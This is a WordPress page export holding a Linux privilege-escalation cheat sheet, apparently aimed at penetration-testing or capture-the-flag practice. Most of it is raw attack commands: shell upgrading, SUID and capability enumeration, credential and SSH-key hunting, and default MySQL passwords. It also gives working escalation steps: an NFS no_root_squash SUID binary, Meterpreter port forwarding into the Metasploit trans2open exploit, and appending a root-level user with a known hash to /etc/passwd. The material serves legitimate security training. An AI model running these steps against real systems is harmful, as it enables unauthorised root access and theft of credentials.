{"id":125,"date":"2021-04-24T00:52:20","date_gmt":"2021-04-24T00:52:20","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?page_id=125"},"modified":"2025-08-04T23:59:45","modified_gmt":"2025-08-04T23:59:45","slug":"linux-privilege-escalation-resources","status":"publish","type":"page","link":"https:\/\/sirensecurity.io\/blog\/linux-privilege-escalation-resources\/","title":{"rendered":"Linux Privilege Escalation - Resources"},"content":{"rendered":"\n<div class=\"wp-block-cover\" style=\"min-height:391px;aspect-ratio:unset;\"><img loading=\"lazy\" decoding=\"async\" width=\"6000\" height=\"3375\" class=\"wp-block-cover__image-background wp-image-126\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2021\/04\/2-1.jpg\" data-object-fit=\"cover\"\/><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"><\/span><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p>Linux Privilege Escalation<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">S1REN<\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-red-color has-text-color has-large-font-size\">What's my path to root?<br><\/p>\n<\/div><\/div>\n\n\n\n<pre class=\"wp-block-code\"><code>\n\ng0tmilk's Guide to Linux Privilege Escalation as well:\nhttps:&#47;&#47;blog.g0tmi1k.com\/2011\/08\/basic-linux-privilege-escalation\/\n\nI just got a low-priv shell ! \nWhat would S1REN do right now?\npython -c 'import pty; pty.spawn(\"\/bin\/bash\")'\nOR\npython3 -c 'import pty; pty.spawn(\"\/bin\/bash\")'\nexport PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/tmp\nexport TERM=xterm-256color\nalias ll='ls -lsaht --color=auto'\nCtrl + Z &#91;Background Process]\nstty raw -echo ; fg ; reset\nstty columns 200 rows 200\n\nS1REN would say:\nVarious Capabilities?\nwhich gcc\nwhich cc\nwhich python\nwhich perl\nwhich wget\nwhich curl\nwhich fetch\nwhich nc\nwhich ncat\nwhich nc.traditional\nwhich socat\n\nCompilation? (Very Back Burner)\nfile \/bin\/bash\nuname -a\ncat \/etc\/*-release\ncat \/etc\/issue\n\nWhat Arch?\nfile \/bin\/bash\n\nKernel?\nuname -a\n\nIssue\/Release?\ncat \/etc\/issue\ncat \/etc\/*-release\n\nAre we a real user?\nsudo -l\nls -lsaht \/etc\/sudoers\n\nAre any users a member of exotic groups?\ngroups &lt;user>\n\nCheck out your shell's environment variables...\nenv\nhttps:\/\/www.hackingarticles.in\/linux-privilege-escalation-using-path-variable\/\n\nUsers?\ncd \/home\/\nls -lsaht\n\nWeb Configs containing credentials?\ncd \/var\/www\/html\/\nls -lsaht\n\nSUID Binaries?\nfind \/ -perm -u=s -type f 2>\/dev\/null\n\nGUID Binaries?\nfind \/ -perm -g=s -type f 2>\/dev\/null\n\nSUID\/GUID\/SUDO Escalation:\nhttps:\/\/gtfobins.github.io\/\n\nBinary\/Languages with \"Effective Permitted\" or \"Empty Capability\" (ep):\nhttps:\/\/www.insecure.ws\/linux\/getcap_setcap.html#getcap-setcap-and-file-capabilities\nGet Granted\/Implicit (Required by a Real User) Capabilities of all files recursively throughout the system and pipe all error messages to \/dev\/null.\ngetcap -r \/ 2>\/dev\/null\n\nWe need to start monitoring the system if possible while performing our enumeration...\nIn other words:\n\"S1REN... Is privilege escalation going to come from some I\/O file operations being done by some script on the system?\"\nhttps:\/\/github.com\/DominicBreuker\/pspy\/blob\/master\/README.md\ncd \/var\/tmp\/\nFile Transfer --> pspy32\nFile Transfer --> pspy64\nchmod 755 pspy32 pspy64\n.\/pspy&lt;32\/64>\n\nWhat does the local network look like?\nnetstat -antup\nnetstat -tunlp\n\nIs anything vulnerable running as root?\nps aux |grep -i 'root' --color=auto\n\nMYSQL Credentials? Root Unauthorized Access?\nmysql -uroot -p\nEnter Password:\nroot : root\nroot : toor\nroot :  \n\nS1REN would take a quick look at etc to see if any user-level people did special things:\ncd \/etc\/\nls -lsaht\nAnything other than root here?\n\u2022 Any config files left behind?\n\u2192 ls -lsaht |grep -i \u2018.conf\u2019 --color=auto\n\n\u2022 If we have root priv information disclosure - are there any .secret in \/etc\/ files?\n\u2192 ls -lsaht |grep -i \u2018.secret\u2019 --color=aut\n\nSSH Keys I can use perhaps for even further compromise?\nls -lsaR \/home\/\n\nQuick look in:\nls -lsaht \/var\/lib\/\nls -lsaht \/var\/db\/\n\nQuick look in:\nls -lsaht \/opt\/\nls -lsaht \/tmp\/\nls -lsaht \/var\/tmp\/\nls -lsaht \/dev\/shm\/\n\nFile Transfer Capability? What can I use to transfer files?\nwhich wget\nwhich curl\nwhich nc\nwhich fetch (BSD)\nls -lsaht \/bin\/ |grep -i 'ftp' --color=auto\n\nNFS? Can we exploit weak NFS Permissions?\ncat \/etc\/exports\nno_root_squash?\nhttps:\/\/recipeforroot.com\/attacking-nfs-shares\/\n\n&#91;On Attacking Machine]\nmkdir -p \/mnt\/nfs\/\nmount -t nfs -o vers=&lt;version 1,2,3> $IP:&lt;NFS Share> \/mnt\/nfs\/ -nolock\ngcc suid.c -o suid\ncp suid \/mnt\/nfs\/\nchmod u+s \/mnt\/nfs\/suid\nsu &lt;user id matching target machine's user-level privilege.>\n\n&#91;On Target Machine]\nuser@host$ .\/suid\n#\n\nWhere can I live on this machine? Where can I read, write and execute files?\n\/var\/tmp\/\n\/tmp\/\n\/dev\/shm\/\n\nAny exotic file system mounts\/extended attributes?\ncat \/etc\/fstab\n\nForwarding out a weak service for root priv (with meterpreter!):\nDo we need to get a meterpreter shell and forward out some ports that might be running off of the Loopback Adaptor (127.0.0.1) and forward them to any (0.0.0.0)? If I see something like Samba SMBD out of date on 127.0.0.1 - we should look to forward out the port and then run trans2open on our own machine at the forwarded port.\nhttps:\/\/www.offensive-security.com\/metasploit-unleashed\/portfwd\/\n\nForwarding out netbios-ssn EXAMPLE:\nmeterpreter> portfwd add \u2013l 139 \u2013p 139 \u2013r &#91;target remote host] \nmeterpreter> background \nuse exploit\/linux\/samba\/trans2open\nset RHOSTS 0.0.0.0\nset RPORT 139\nrun\n\nCan we write as a low-privileged user to \/etc\/passwd?\nopenssl passwd -1\ni&lt;3hacking\n$1$\/UTMXpPC$Wrv6PM4eRHhB1\/m1P.t9l.\necho 'siren:$1$\/UTMXpPC$Wrv6PM4eRHhB1\/m1P.t9l.:0:0:siren:\/home\/siren:\/bin\/bash' >> \/etc\/passwd\nsu siren\nid\n\nCron.\ncrontab \u2013u root \u2013l\n\nLook for unusual system-wide cron jobs:\ncat \/etc\/crontab\nls \/etc\/cron.*\n\nBob is a user on this machine. What is every single file he has ever created?\nfind \/ -user bob 2>\/dev\/null\n\nAny mail? mbox in User $HOME directory?\ncd \/var\/mail\/\ncd \/var\/spool\/mail\/\nls -lsaht\n\nLinpease:\nhttps:\/\/github.com\/carlospolop\/privilege-escalation-awesome-scripts-suite\/tree\/master\/linPEAS\n\nTraitor:\nhttps:\/\/github.com\/liamg\/traitor\n\nGTFOBins:\nhttps:\/\/gtfobins.github.io\/\n\nPSpy32\/Pspy64:\nhttps:\/\/github.com\/DominicBreuker\/pspy\/blob\/master\/README.md<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":4,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-125","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/125","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=125"}],"version-history":[{"count":58,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/125\/revisions"}],"predecessor-version":[{"id":800,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/125\/revisions\/800"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}